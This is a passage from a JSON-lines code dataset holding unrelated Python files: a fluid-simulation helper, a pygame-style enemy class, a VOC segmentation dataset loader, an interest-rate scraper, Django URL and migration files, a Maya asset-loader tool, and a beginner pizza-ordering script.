bc(problem)\n\ndef _ns_sponge_nonlin(problem, domain, params, bc):\n ''' sponge zone velocities w nonlin terms '''\n problem.parameters['sponge'] = get_sponge(domain, params)\n problem.add_equation('dx(ux) + uz_z = 0')\n problem.add_equation(\n 'dt(rho) + sponge * rho - rho0 * uz / H' +\n '= -ux * dx(rho) - uz * dz(rho)')\n problem.add_equation(\n 'dt(ux) + sponge * ux + dx(P) / rho0' +\n ' - NU * (dx(dx(ux)) + dz(ux_z))' +\n '= 0')\n problem.add_equation(\n 'dt(uz) + sponge * uz + dz(P) / rho0 + rho * g / rho0' +\n ' - NU * (dx(dx(uz)) + dz(uz_z))' +\n '= 0')\n problem.add_equation('dz(ux) - ux_z = 0')\n problem.add_equation('dz(uz) - uz_z = 0')\n bc(problem)\n\ndef ns_sponge_lin(problem, domain, params):\n _ns_sponge_lin(problem, domain, params, _ns_bc)\n\ndef ns_sponge_lin_gradual(problem, domain, params):\n _ns_sponge_lin(problem, domain, params, _ns_bc_gradual)\n\ndef ns_sponge_nonlin(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_bc)\n\ndef ns_sponge_nonlin2(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_bc2)\n\ndef ns_sponge_nonlin_p_bc(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_p_bc)\n\ndef ns_sponge_nonlin_gradual(problem, domain, params):\n _ns_sponge_nonlin(problem, domain, params, _ns_bc_gradual)\n\ndef default_problem(problem):\n \"\"\" TODO needs updating \"\"\"\n problem.add_equation(\"dx(ux) + dz(uz) = 0\")\n problem.add_equation(\"dt(rho) - rho0 * uz / H = 0\")\n problem.add_equation(\n \"dt(ux) + dx(P) / rho0 = 0\")\n problem.add_equation(\n \"dt(uz) + dz(P) / rho0 + rho * g / rho0 = 0\")\n\n problem.add_bc(\"left(P) = 0\", condition=\"nx == 0\")\n problem.add_bc(\"left(uz) = A * cos(KX * x - omega * t)\")\n\n###\n### SOLVER SETUP\n###\n\ndef _get_solver(setup_problem, params, variables):\n ''' get solver for given variables '''\n x_basis = de.Fourier('x',\n params['N_X'],\n interval=(0, params['XMAX']),\n dealias=3/2)\n z_basis = de.Chebyshev('z',\n params['N_Z'],\n interval=(0, params['ZMAX']),\n dealias=3/2)\n domain = de.Domain([x_basis, z_basis], np.float64)\n z = domain.grid(1)\n\n problem = de.IVP(domain, variables=variables)\n problem.parameters['L'] = params['XMAX']\n problem.parameters['g'] = params['G']\n problem.parameters['H'] = params['H']\n problem.parameters['A'] = params['A']\n problem.parameters['KX'] = params['KX']\n problem.parameters['KZ'] = params['KZ']\n problem.parameters['NU'] = params['NU']\n problem.parameters['RHO0'] = params['RHO0']\n problem.parameters['omega'] = params['OMEGA']\n\n # rho0 stratification\n rho0 = domain.new_field()\n rho0.meta['x']['constant'] = True\n rho0['g'] = params['RHO0'] * np.exp(-z / params['H'])\n problem.parameters['rho0'] = rho0\n\n setup_problem(problem, domain, params)\n\n # Build solver\n solver = problem.build_solver(de.timesteppers.RK222)\n solver.stop_sim_time = params['T_F']\n solver.stop_wall_time = np.inf\n solver.stop_iteration = np.inf\n return solver, domain\n\ndef get_solver(setup_problem, params):\n return _get_solver(setup_problem,\n params,\n variables=['P', 'rho', 'ux', 'uz'])\n\ndef ns_get_solver(setup_problem, params):\n return _get_solver(setup_problem,\n params,\n variables=['P', 'rho', 'ux', 'uz', 'uz_z', 'ux_z'])\n\n###\n### ENTRY POINTS\n###\n\ndef run_strat_sim(get_solver, setup_problem, set_ICs, name, params):\n snapshots_dir = SNAPSHOTS_DIR % name\n try:\n os.makedirs(snapshots_dir)\n except FileExistsError:\n print('snapshots already exist, exiting...')\n return\n logger = logging.getLogger(name)\n\n solver, domain = get_solver(setup_problem, params)\n\n # Initial conditions\n set_ICs(solver, domain, params)\n\n cfl = CFL(solver,\n initial_dt=params['DT'],\n cadence=10,\n max_dt=params['DT'],\n threshold=0.10)\n cfl.add_velocities(('ux', 'uz'))\n snapshots = solver.evaluator.add_file_handler(\n snapshots_dir,\n sim_dt=params['T_F'] / params['NUM_SNAPSHOTS'])\n snapshots.add_system(solver.state)\n\n # Main loop\n logger.info('Starting sim...')\n while solver.ok:\n cfl_dt = cfl.compute_dt() if params.get('USE_CFL') else params['DT']\n solver.step(cfl_dt)\n curr_iter = solver.iteration\n\n if curr_iter % int((params['T_F'] / params['DT']) /\n params['NUM_SNAPSHOTS']) == 0:\n logger.info('Reached time %f out of %f, timestep %f vs max %f',\n solver.sim_time,\n solver.stop_sim_time,\n cfl_dt,\n params['DT'])\n\ndef load(get_solver, setup_problem, name, params):\n dyn_vars = ['uz', 'ux', 'rho', 'P']\n snapshots_dir = SNAPSHOTS_DIR % name\n filename = '{s}/{s}_s1/{s}_s1_p0.h5'.format(s=snapshots_dir)\n\n if not os.path.exists(snapshots_dir):\n raise ValueError('No snapshots dir \"%s\" found!' % snapshots_dir)\n\n solver, domain = get_solver(setup_problem, params)\n z = domain.grid(1, scales=params['INTERP_Z'])\n\n with h5py.File(filename, mode='r') as dat:\n sim_times = np.array(dat['scales']['sim_time'])\n # we let the file close before trying to reopen it again in load\n\n # load into state_vars\n state_vars = defaultdict(list)\n for idx in range(len(sim_times)):\n solver.load_state(filename, idx)\n\n for varname in dyn_vars:\n values = solver.state[varname]\n values.set_scales((params['INTERP_X'], params['INTERP_Z']),\n keep_data=True)\n state_vars[varname].append(np.copy(values['g']))\n # cast to np arrays\n for key in state_vars.keys():\n state_vars[key] = np.array(state_vars[key])\n\n state_vars['rho'] += params['RHO0'] * np.exp(-z / params['H'])\n state_vars['P'] += params['RHO0'] * (np.exp(-z / params['H']) - 1) *\\\n params['G'] * params['H']\n state_vars['rho1'] = state_vars['rho'] - params['RHO0'] *\\\n np.exp(-z / params['H'])\n state_vars['P1'] = state_vars['P'] -\\\n params['RHO0'] * (np.exp(-z / params['H']) - 1) *\\\n params['G'] * params['H']\n\n state_vars['E'] = state_vars['rho'] * \\\n (state_vars['ux']**2 + state_vars['uz']**2) / 2\n state_vars['F_z'] = state_vars['uz'] * (\n state_vars['rho'] * (state_vars['ux']**2 + state_vars['uz']**2)\n + state_vars['P'])\n return sim_times, domain, state_vars\n\ndef plot(get_solver, setup_problem, name, params):\n slice_suffix = '(x=0)' # slice suffix\n SAVE_FMT_STR = 't_%d.png'\n snapshots_dir = SNAPSHOTS_DIR % name\n path = '{s}/{s}_s1'.format(s=snapshots_dir)\n matplotlib.rcParams.update({'font.size': 6})\n plot_vars = ['uz', 'ux']\n z_vars = ['F_z', 'E'] # sum these over x\n slice_vars = ['%s%s' % (i, slice_suffix)\n for i in ['uz', 'ux', 'rho1', 'P1']]\n n_cols = 3\n n_rows = 3\n plot_stride = 2\n\n if os.path.exists('%s.mp4' % name):\n print('%s.mp4 already exists, not regenerating' % name)\n return\n\n sim_times, domain, state_vars = load(get_solver, setup_problem, name, params)\n\n x = domain.grid(0, scales=params['INTERP_X'])\n z = domain.grid(1, scales=params['INTERP_Z'])\n xmesh, zmesh = quad_mesh(x=x[:, 0], y=z[0])\n\n for var in z_vars:\n state_vars[var] = np.sum(state_vars[var], axis=1)\n for var in slice_vars:\n state_vars[var] = state_vars[var.replace(slice_suffix, '')][:, 0, :]\n\n for t_idx, sim_time in list(enumerate(sim_times))[::plot_stride]:\n fig = plt.figure(dpi=200)\n\n idx = 1\n for var in plot_vars:\n axes = fig.add_subplot(n_rows, n_cols, idx, title=var)\n\n var_dat = state_vars[var]\n p = axes.pcolormesh(xmesh,\n zmesh,\n var_dat[t_idx].T,\n vmin=var_dat.min(), vmax=var_dat.max())\n axes.axis(pad_limits(xmesh, zmesh))\n cb = fig.colorbar(p, ax=axes)\n cb.ax.set_yticklabels(cb.ax.get_yticklabels(), rotation=30)\n plt.xticks(rotation=30)\n plt.yticks(rotation=30)\n idx += 1\n for var in z_vars + slice_vars:\n axes = fig.add_subplot(n_rows, n_cols, idx, title=var)\n var_dat = state_vars[var]\n z_pts = (zmesh[1:, 0] + zmesh[:-1, 0]) / 2\n p = axes.plot(var_dat[t_idx], z_pts)\n if slice_suffix in var:\n p = axes.plot(\n get_analytical_sponge(var.replace(slice_suffix, ''),\n z_pts,\n sim_time,\n params),\n z_pts)\n plt.xticks(rotation=30)\n plt.yticks(rotation=30)\n xlims = [var_dat.min(), var_dat.max()]\n axes.set_xlim(*xlims)\n p = axes.plot(xlims, [params['SPONGE_START']] * len(xlims), 'r--')\n idx += 1\n\n fig.suptitle(\n 'Config: %s (t=%.2f, kx=%.2f, kz=%.2f, omega=%.2f)' %\n (name, sim_time, params['KX'], params['KZ'], params['OMEGA']))\n fig.subplots_adjust(hspace=0.5, wspace=0.6)\n savefig = SAVE_FMT_STR % (t_idx // plot_stride)\n plt.savefig('%s/%s' % (path, savefig))\n print('Saved %s/%s' % (path, savefig))\n plt.close()\n os.system('ffmpeg -y -framerate 12 -i %s/%s %s.mp4' %\n (path, SAVE_FMT_STR, name))\n","sub_path":"sims_old/2d_2_strat_drop_terms/strat_helper.py","file_name":"strat_helper.py","file_ext":"py","file_size_in_byte":17549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407217945","text":"from pico2d import *\n\nimport math\n\nimport map_stage_1\n\nimport game_world\n\nimport game_framework\n\nimport enemy_die\n\nclass enemy:\n image = None\n\n def __init__(self, show = 0):\n self.x = -100\n self.y = 300\n self.hp = 10\n self.radians = 0.0\n self.head = 0\n self.frame = 0\n self.reflect = ''\n self.count = show\n self.showtime = get_time()\n self.size = 50\n if enemy.image is None:\n enemy.image = load_image('enemy_image//stage1_pig1.png')\n\n def update(self):\n if self.hp < 0:\n game_world.remove_object(self)\n die = enemy_die.die(self.x,self.y,50,50)\n game_framework.GameState.money += 10\n game_world.add_object(die, 1)\n if self.count == 0 :\n if self.x > 0 :\n self.frame = (self.frame + 14 * game_framework.frame_time) % 7\n\n self.x = self.x + (100 * math.cos(self.radians)) * game_framework.frame_time\n self.y = self.y + (100 * math.sin(self.radians)) * game_framework.frame_time\n\n if map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 1:\n self.radians = 3.14\n self.reflect = \"hv\"\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 2:\n self.radians = -1.57\n self.reflect = ''\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 3:\n self.radians = 0\n self.reflect = ''\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 4:\n self.radians = 1.57\n self.reflect = ''\n elif map_stage_1.tile_rotate[int(self.y // 50)][int(self.x // 50)] == 5:\n game_world.remove_object(self)\n game_framework.GameState.life -= 1\n\n else :\n self.x = self.x + (100 * math.cos(self.radians)) * game_framework.frame_time\n self.y = self.y + (100 * math.sin(self.radians)) * game_framework.frame_time\n\n else :\n if self.count < get_time() - self.showtime:\n self.count = 0\n\n def draw(self):\n self.image.clip_composite_draw(0, 50 + 50 * int(self.frame), 50, 50, self.radians, self.reflect, self.x, self.y, self.size, self.size)\n\n def get_bb(self):\n return self.x, self.y","sub_path":"2DGP project/2DGP 게임 제작/enemy_stage_1.py","file_name":"enemy_stage_1.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40336069","text":"import torch.utils.data as data\nimport os.path\nimport numpy as np\nimport matplotlib.cm\nfrom PIL import Image\n\nclass VOC(data.Dataset):\n \"\"\"\n Pascal VOC 2012 Dataset class. You can get the data from: \n http://host.robots.ox.ac.uk/pascal/VOC/voc2012/index.html#devkit\n\n Args:\n root (str): Path to data folder.\n transform (object): Data transforms to apply to images.\n target_transform (object): Data transforms to apply to labels.\n image_set (str): Which split to load, either 'train or val'\n\n Example:\n >>> from xt_cvdata.transforms import ToLabel, Relabel\n >>> from torchvision import transforms\n >>> \n >>> data_transforms = transforms.Compose([\n >>> transforms.ToTensor()\n >>> ])\n >>>\n >>> # These custom transforms are in xt_cvdata.transforms\n >>> label_transforms = transforms.Compose([\n >>> ToLabel(),\n >>> Relabel(255, 21)\n >>> ])\n >>> \n >>> dataset = xcvd.datasets.VOC(\n '/nasty/data/common/VOC2012', \n transform=data_transforms, \n target_transform=label_transforms\n )\n \"\"\"\n def __init__(self, root, transform=None, target_transform=None, image_set='train'):\n self.root = root\n self.transform = transform\n self.target_transform = target_transform\n\n self._image_set = image_set\n self._imsetpath = os.path.join(self.root, 'ImageSets', 'Segmentation', '%s.txt')\n self._annopath = os.path.join(self.root, 'SegmentationClass', '%s.png')\n self._impath = os.path.join(self.root, 'JPEGImages', '%s.jpg')\n \n with open(self._imsetpath % self._image_set) as f:\n self.ids = f.readlines()\n self.ids = [x.strip('\\n') for x in self.ids]\n\n self.labels = [\n 'background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat',\n 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor', 'void'\n ]\n self.cmap = self._color_map()\n\n def __getitem__(self, index):\n img_id = self.ids[index]\n target = Image.open(self._annopath % img_id)\n img = Image.open(self._impath % img_id).convert('RGB')\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n \n return img, target\n\n def __len__(self):\n return len(self.ids)\n\n def _color_map(self, normalized=True, base_map_name='tab20'):\n \"\"\"\n Custom Colormap for the labels.\n \"\"\"\n\n base_map = matplotlib.cm.get_cmap(base_map_name, 22).colors\n cmap = np.zeros_like(base_map)\n cmap[0,-1] = 1\n cmap[1:-1] = base_map[:20]\n cmap[-1] = [1, 1, 1, 1]\n\n return matplotlib.colors.ListedColormap(cmap)\n \n","sub_path":"xt_cvdata/datasets/voc.py","file_name":"voc.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"216261830","text":"import pandas as pd\nimport requests\nfrom requests.exceptions import RequestException\n\n\ndef main():\n html = get_html('http://www.chinamoney.com.cn/r/cms/www/chinamoney/data/currency/bk-lpr.json')\n data = get_content(html)\n df = pd.DataFrame(data)\n print(df)\n # res = sendMail.send_email('LRU利率', df.to_html())\n # print(res)\n # print(html['data']['showDateCN'])\n\n\ndef get_content(html):\n content = []\n data = {\n 'date': html['data']['showDateCN'],\n }\n for i in html['records']:\n data[i['termCode']] = i['shibor'] + '%'\n content.append(data)\n return content\n\n\ndef get_html(url):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/90.0.4430.212 Safari/537.36 \"\n }\n try:\n r = requests.get(url, headers=headers)\n if r.status_code == 200:\n # r.encoding = 'utf-8'\n return r.json()\n else:\n return None\n except RequestException:\n return None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/爬取LRU利率.py","file_name":"爬取LRU利率.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280497841","text":"'''\nCreated on 2012-10-1\n\n'''\nfrom django.conf.urls.defaults import patterns, url\n\n\nurlpatterns = patterns('utils.views',\n\n url(r'^initialization/', 'initialization'),\n \n url(r'^cleanupData/', 'cleanupDataBase'),\n \n url(r'^initProvince/', 'WriteLoctionJsonToDatabase'),\n \n url(r'^initContentIndex/', 'initContentIndex')\n \n)\n","sub_path":"utils/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431187140","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('evenementen', '0002_evenement_intro'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aanmelding',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('voornaam', models.CharField(max_length=200)),\n ('achternaam', models.CharField(max_length=200)),\n ('evenement', models.ForeignKey(to='evenementen.Evenement')),\n ],\n ),\n ]\n","sub_path":"src/evenementen/migrations/0003_aanmelding.py","file_name":"0003_aanmelding.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"311140968","text":"import os\nimport sys\nimport itertools\n\nfrom ...vendor.Qt import QtWidgets, QtCore\nfrom ... import api\nfrom .. import lib\n\n\nself = sys.modules[__name__]\nself._window = None\n\n# Store previous results from api.ls()\nself._cache = list()\nself._use_cache = False\n\n# Custom roles\nAssetRole = QtCore.Qt.UserRole + 1\nSubsetRole = QtCore.Qt.UserRole + 2\n\n\nclass Window(QtWidgets.QDialog):\n \"\"\"Basic asset loader interface\n\n _________________________________________\n | |\n | Assets |\n | _____________________________________ |\n | | | | |\n | | Asset 1 | Subset 1 | |\n | | Asset 2 | Subset 2 | |\n | | ... | ... | |\n | | | | |\n | | | | |\n | | | | |\n | | | | |\n | | | | |\n | | | | |\n | |__________________|__________________| |\n | _____________________________________ |\n | | | |\n | | Load | |\n | |_____________________________________| |\n |_________________________________________|\n\n \"\"\"\n\n def __init__(self, parent=None):\n super(Window, self).__init__(parent)\n self.setWindowTitle(\"Asset Loader\")\n self.setFocusPolicy(QtCore.Qt.StrongFocus)\n\n body = QtWidgets.QWidget()\n footer = QtWidgets.QWidget()\n\n container = QtWidgets.QWidget()\n\n assets = QtWidgets.QListWidget()\n subsets = QtWidgets.QListWidget()\n\n # Enable loading many subsets at once\n subsets.setSelectionMode(subsets.ExtendedSelection)\n\n layout = QtWidgets.QHBoxLayout(container)\n layout.addWidget(assets)\n layout.addWidget(subsets)\n layout.setContentsMargins(0, 0, 0, 0)\n\n options = QtWidgets.QWidget()\n layout = QtWidgets.QGridLayout(options)\n layout.setContentsMargins(0, 0, 0, 0)\n\n autoclose_checkbox = QtWidgets.QCheckBox(\"Close after load\")\n autoclose_checkbox.setCheckState(QtCore.Qt.Checked)\n layout.addWidget(autoclose_checkbox, 1, 0)\n\n layout = QtWidgets.QVBoxLayout(body)\n layout.addWidget(container)\n layout.addWidget(options, 0, QtCore.Qt.AlignLeft)\n layout.setContentsMargins(0, 0, 0, 0)\n\n load_button = QtWidgets.QPushButton(\"Load\")\n refresh_button = QtWidgets.QPushButton(\"Refresh\")\n stop_button = QtWidgets.QPushButton(\"Searching..\")\n stop_button.setToolTip(\"Click to stop searching\")\n message = QtWidgets.QLabel()\n message.hide()\n\n layout = QtWidgets.QVBoxLayout(footer)\n layout.addWidget(load_button)\n layout.addWidget(stop_button)\n layout.addWidget(refresh_button)\n layout.addWidget(message)\n layout.setContentsMargins(0, 0, 0, 0)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(body)\n layout.addWidget(footer)\n\n self.data = {\n \"state\": {\n \"running\": False,\n },\n \"button\": {\n \"load\": load_button,\n \"stop\": stop_button,\n \"autoclose\": autoclose_checkbox,\n },\n \"model\": {\n \"assets\": assets,\n \"subsets\": subsets,\n },\n \"label\": {\n \"message\": message,\n }\n }\n\n load_button.clicked.connect(self.on_load_pressed)\n stop_button.clicked.connect(self.on_stop_pressed)\n refresh_button.clicked.connect(self.on_refresh_pressed)\n assets.currentItemChanged.connect(self.on_assetschanged)\n subsets.currentItemChanged.connect(self.on_subsetschanged)\n\n # Defaults\n self.resize(320, 350)\n\n load_button.hide()\n stop_button.setFocus()\n\n def keyPressEvent(self, event):\n \"\"\"Delegate keyboard events\"\"\"\n\n if event.key() == QtCore.Qt.Key_Return:\n return self.on_enter()\n\n def on_enter(self):\n self.on_load_pressed()\n\n def on_assetschanged(self, *args):\n assets_model = self.data[\"model\"][\"assets\"]\n subsets_model = self.data[\"model\"][\"subsets\"]\n\n subsets_model.clear()\n\n asset_item = assets_model.currentItem()\n\n # The model is empty\n if asset_item is None:\n return\n\n asset = asset_item.data(AssetRole)\n\n # The model contains an empty item\n if asset is None:\n return\n\n for subset in asset[\"subsets\"]:\n item = QtWidgets.QListWidgetItem(subset[\"name\"])\n item.setData(QtCore.Qt.ItemIsEnabled, True)\n item.setData(SubsetRole, subset)\n subsets_model.addItem(item)\n\n def on_subsetschanged(self, *args):\n button = self.data[\"button\"][\"load\"]\n item = self.data[\"model\"][\"assets\"].currentItem()\n button.setEnabled(item.data(QtCore.Qt.ItemIsEnabled))\n\n def refresh(self):\n \"\"\"Load assets from disk and add them to a QListView\n\n This method runs part-asynchronous, in that it blocks\n when busy, but takes brief intermissions between each\n asset found so as to lighten the load off of disk, and\n to enable the artist to abort searching once the target\n asset has been found.\n\n \"\"\"\n\n assets_model = self.data[\"model\"][\"assets\"]\n assets_model.clear()\n\n state = self.data[\"state\"]\n\n has = {\"assets\": False}\n\n module = sys.modules[__name__]\n if module._use_cache:\n print(\"Using cache..\")\n iterators = iter(module._cache)\n\n else:\n print(\"Reading from disk..\")\n assets = api.ls(os.path.join(api.registered_root(), \"assets\"))\n film = api.ls(os.path.join(api.registered_root(), \"film\"))\n iterators = itertools.chain(assets, film)\n\n def on_next():\n if not state[\"running\"]:\n return on_finished()\n\n try:\n asset = next(iterators)\n\n # Cache for re-use\n if not module._use_cache:\n module._cache.append(asset)\n\n except StopIteration:\n return on_finished()\n\n has[\"assets\"] = True\n\n item = QtWidgets.QListWidgetItem(asset[\"name\"])\n item.setData(QtCore.Qt.ItemIsEnabled, True)\n item.setData(AssetRole, asset)\n assets_model.addItem(item)\n\n lib.defer(25, on_next)\n\n def on_finished():\n state[\"running\"] = False\n module._use_cache = True\n\n if not has[\"assets\"]:\n item = QtWidgets.QListWidgetItem(\"No assets found\")\n item.setData(QtCore.Qt.ItemIsEnabled, False)\n assets_model.addItem(item)\n\n assets_model.setCurrentItem(assets_model.item(0))\n assets_model.setFocus()\n self.data[\"button\"][\"load\"].show()\n self.data[\"button\"][\"stop\"].hide()\n\n state[\"running\"] = True\n lib.defer(25, on_next)\n\n def on_refresh_pressed(self):\n # Clear cache\n sys.modules[__name__]._cache[:] = []\n sys.modules[__name__]._use_cache = False\n\n self.refresh()\n\n def on_stop_pressed(self):\n button = self.data[\"button\"][\"stop\"]\n button.setText(\"Stopping..\")\n button.setEnabled(False)\n\n self.data[\"state\"][\"running\"] = False\n\n def on_load_pressed(self):\n button = self.data[\"button\"][\"load\"]\n if not button.isEnabled():\n return\n\n assets_model = self.data[\"model\"][\"assets\"]\n subsets_model = self.data[\"model\"][\"subsets\"]\n autoclose_checkbox = self.data[\"button\"][\"autoclose\"]\n\n asset_item = assets_model.currentItem()\n\n for subset_item in subsets_model.selectedItems():\n\n if subset_item is None:\n return\n\n asset = asset_item.data(AssetRole)\n subset = subset_item.data(SubsetRole)\n assert asset\n assert subset\n\n try:\n api.registered_host().load(asset, subset)\n\n except ValueError as e:\n self.echo(e)\n raise\n\n except NameError as e:\n self.echo(e)\n raise\n\n # Catch-all\n except Exception as e:\n self.echo(\"Program error: %s\" % str(e))\n raise\n\n if autoclose_checkbox.checkState():\n self.close()\n\n def echo(self, message):\n widget = self.data[\"label\"][\"message\"]\n widget.setText(str(message))\n widget.show()\n print(message)\n\n def closeEvent(self, event):\n print(\"Good bye\")\n self.data[\"state\"][\"running\"] = False\n return super(Window, self).closeEvent(event)\n\n\ndef show(root=None, debug=False):\n \"\"\"Display Loader GUI\n\n Arguments:\n debug (bool, optional): Run loader in debug-mode,\n defaults to False\n\n \"\"\"\n\n if self._window:\n self._window.close()\n del(self._window)\n\n try:\n widgets = QtWidgets.QApplication.topLevelWidgets()\n widgets = dict((w.objectName(), w) for w in widgets)\n parent = widgets[\"MayaWindow\"]\n except KeyError:\n parent = None\n\n # Debug fixture\n fixture = api.fixture(assets=[\"Ryan\",\n \"Strange\",\n \"Blonde_model\"])\n\n with fixture if debug else lib.dummy():\n with lib.application():\n window = Window(parent)\n window.show()\n\n window.refresh()\n\n self._window = window\n","sub_path":"mindbender/tools/loader/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"368565414","text":"import os #For commands\nimport sys #For who-knows-what\n\ninterfaces = {}\nprint('INTERFACES:')\nif sys.platform.startswith('win'):\n print('\\tWindows OS features available')\n interfaces['os'] = 'win'\nelif sys.platform.startswith('linux') or os.platform.startswith('darwin'):\n print('\\t*nix features available')\n interfaces['os'] = '*nix'\nelse:\n print('\\tOS-specific interface not available')\n interfaces['os'] = None\n\ntry:\n import requests #For APIs\n interfaces['web'] = True\n print('\\tWeb API interface available')\nexcept ImportError:\n print('\\tWeb API interface not available')\n interfaces['web'] = False\ntry:\n import Skype4Py #For skype interfacing\n interfaces['skype'] = True\n print('\\tSkype interface available')\nexcept ImportError:\n print('\\tSkype interface not available.')\n interfaces['skype'] = False\n\ntry:\n import tkMessageBox #For skype interfacing\n interfaces['messagebox'] = True\n print('\\tMessage Box interface available')\nexcept ImportError:\n print('\\tMessage Box interface not available.')\n interfaces['messagebox'] = False\n\nif interfaces['os'] == 'win':\n try:\n import speech #Not available on all platforms and not in the standard library, but useful\n interfaces['speech'] = True\n print('\\tVoice interface available')\n except ImportError:\n print('\\tVoice interface not available')\n interfaces['speech'] = False\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"632461013","text":"from django.conf.urls import url\nfrom .views import AddCartView, CartInfoView, UpdateCartView, DeleteCartView\nfrom utils.login import login_required\napp_name = 'cart'\nurlpatterns = [\n url(r'^add$', AddCartView.as_view(), name='add'),\n # 只有登录的用户才有购物车\n url(r'^$', login_required(CartInfoView.as_view()), name='cart'),\n url(r'^update$', login_required(UpdateCartView.as_view()), name='update'),\n url(r'^delete$', login_required(DeleteCartView.as_view()), name='delete')\n]\n","sub_path":"apps/cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304912313","text":"\"\"\"dataWall URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf.urls import patterns, include, url\nfrom dataWall import views\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\turl(r'^$', 'dataWall.views.home', name='home'),\n\n\t#taxa pages\n\turl(r'^bats/$', 'dataWall.views.bats', name='bats'),\n\turl(r'^birds/$', 'dataWall.views.birds', name='birds'),\n\turl(r'^herps/$', 'dataWall.views.herps', name='herps'),\n\turl(r'^large-mammals/$', 'dataWall.views.largeMammals', name='large-mammals'),\n\turl(r'^habitat/$', 'dataWall.views.habitat', name='habitat'),\n\turl(r'^gis/$', 'dataWall.views.gis', name='gis'),\n\t\n\t#media\n\turl(r'^media/(?P.*)$', 'django.views.static.serve',{'document_root': settings.MEDIA_ROOT}),\n\t\n\t#unused at the moment\n\turl(r'^datawall/$', 'dataWall.views.datawall', name='datawall'),\n\t#url(r'^dataselect/$', 'dataWall.views.dataselect', name='dataselect'),\n\t#url(r'^speciesLists/$', 'dataWall.views.speciesLists', name='speciesList'),\n\t#url(r'^results/$', 'dataWall.views.results', name='results'),\n\n\t\n]\n","sub_path":"dataWall/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"430054629","text":"# 🚨 Don't change the code below 👇\nprint(\"Welcome to Daniel's Python Pizza Deliveries!\")\nsize = input(\"What size pizza do you want? S, M, or L \")\nadd_pepperoni = input(\"Do you want pepperoni? Y or N \")\nextra_cheese = input(\"Do you want extra cheese? Y or N \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\n\nbill = 0\n\nif size == \"S\":\n bill = 15\n\nelif size == \"M\":\n bill = 20\n\nelse:\n bill = 25\n\nif add_pepperoni == \"Y\":\n if size == \"S\":\n bill += 2\n\n else:\n bill += 3\n\nif extra_cheese == \"Y\":\n bill += 1\n print(f\"The price of your pizza with pepperoni and extra cheese is £{bill}\")\n\nprint(\"Thank you for your patronage. \")\n\n\n","sub_path":"Pizza Ordering.py","file_name":"Pizza Ordering.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"441625224","text":"import functools\n\nfrom django import http\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.shortcuts import get_object_or_404, redirect\n\nimport jingo\nfrom tower import ugettext_lazy as _lazy, ugettext as _\n\nimport amo.utils\nfrom amo.decorators import login_required\nfrom amo.urlresolvers import reverse\nfrom access import acl\nfrom amo.decorators import login_required\nfrom amo.urlresolvers import reverse\nfrom addons.models import Addon\nfrom addons.views import BaseFilter\nfrom tags.models import Tag\nfrom translations.query import order_by_translation\nfrom .models import Collection, CollectionAddon, CollectionUser, CollectionVote\nfrom . 